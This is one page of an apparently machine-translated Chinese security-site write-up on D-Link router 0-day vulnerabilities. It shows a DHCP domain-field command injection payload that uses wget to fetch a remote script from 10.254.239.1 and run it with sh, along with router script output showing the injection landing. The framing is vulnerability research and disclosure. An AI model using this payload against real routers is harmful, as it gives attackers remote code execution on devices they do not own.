欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

D-link十个漏洞0Day研究(附上详细过程)

来源:本站整理 作者:佚名 时间:2017-09-13 TAG: 我要投稿
121                         ' "SIXRDPLEN=$sixrd_prefixlen"'.
122                         ' "SIXRDMSKLEN=$sixrd_msklen"'.
123                         ' "SIXRDBRIP=$sixrd_bripaddr"'.
124                         ' "SDEST=$sdest"'.
125                         ' "SSUBNET=$ssubnet"'.
126                         ' "SROUTER=$srouter"\n'.
127                 'exit 0\n'
128                 );
用;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re; 能够注入对 /var/servd/ 下一些天生的文件停止注入。
# cat /var/servd/DHCPS4.LAN-1_start.sh
#!/bin/sh
rm -f /var/servd/LAN-1-udhcpd.lease
xmldbc -X /runtime/inf:1/dhcps4/leases
xmldbc -s /runtime/inf:1/dhcps4/pool/start 192.168.0.100
xmldbc -s /runtime/inf:1/dhcps4/pool/end 192.168.0.199
xmldbc -s /runtime/inf:1/dhcps4/pool/leasetime 604800
xmldbc -s /runtime/inf:1/dhcps4/pool/network 192.168.0.1
xmldbc -s /runtime/inf:1/dhcps4/pool/mask 24
xmldbc -s /runtime/inf:1/dhcps4/pool/domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re; command injection
xmldbc -s /runtime/inf:1/dhcps4/pool/router 192.168.0.1
event UPDATELEASES.LAN-1 add "@/etc/events/UPDATELEASES.sh LAN-1 /var/servd/LAN-1-udhcpd.lease"
udhcpd /var/servd/LAN-1-udhcpd.conf &
exit 0
exit 0
#
# cat /var/servd/DHCPS4.LAN-2_start.sh
#!/bin/sh
rm -f /var/servd/LAN-2-udhcpd.lease
xmldbc -X /runtime/inf:2/dhcps4/leases
xmldbc -s /runtime/inf:2/dhcps4/pool/start 192.168.7.100
xmldbc -s /runtime/inf:2/dhcps4/pool/end 192.168.7.199
xmldbc -s /runtime/inf:2/dhcps4/pool/leasetime 604800
xmldbc -s /runtime/inf:2/dhcps4/pool/network 192.168.7.1
xmldbc -s /runtime/inf:2/dhcps4/pool/mask 24
xmldbc -s /runtime/inf:2/dhcps4/pool/domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re; command injection
xmldbc -s /runtime/inf:2/dhcps4/pool/router 192.168.7.1
event UPDATELEASES.LAN-2 add "@/etc/events/UPDATELEASES.sh LAN-2 /var/servd/LAN-2-udhcpd.lease"
udhcpd /var/servd/LAN-2-udhcpd.conf &
exit 0
exit 0
#

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载